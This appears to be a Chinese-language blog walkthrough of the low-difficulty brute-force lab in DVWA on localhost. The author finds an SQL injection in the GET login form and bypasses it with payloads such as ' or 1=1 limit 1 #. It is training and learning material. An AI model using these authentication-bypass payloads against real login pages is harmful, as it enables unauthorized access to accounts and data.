woieha320r的博客

暴力破解-低

行为:
    username:username
    password:password
反馈:
    URL地址栏:http://localhost/vulnerabilities/brute/?username=username&password=password&Login=Login#
推理:
    GET方式提交参数,无需抓包工具了,在地址栏测试
行为:
    http://localhost/vulnerabilities/brute/?username=%27&password=password&Login=Login#
    username:’
    password:password
反馈:
    报错:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5f4dcc3b5aa765d61d8327deb882cf99'' at line 1
推理:
    存在SQL注入漏洞
    数据库为MariaDB
    5f4dcc3b5aa765d61d8327deb882cf99使用md5反编译为password,库中密码存储的是32位md5
    报错中出现了密码值,猜测SQL为:select 列 from 表 where username = '输入' and password = 'md5(输入)'
    尝试写入永真进行登录
行为:
    http://localhost/vulnerabilities/brute/?username=%27+or+1%3D1+or+%271%27%3D%271&password=&Login=Login#
    username:’ or 1=1 or '1'='1
    password:
反馈:
    用户名或密码错误
推理:
    执行跳过了username和password验证的永真语句确不能登录,可能限制结果集仅能查询出一条
    尝试只查询一条
行为:
    http://localhost/vulnerabilities/brute/?username=%27+or+1%3D1+limit+1+%23&password=&Login=Login#
    username:’ or 1=1 limit 1 #
    password:
反馈:
    尝试将结果集限制为只有1条记录的永真语句,登录成功。
    在注释阶段不可用时也可以尝试猜测用户名:admin’ and 1=1 or '1'='1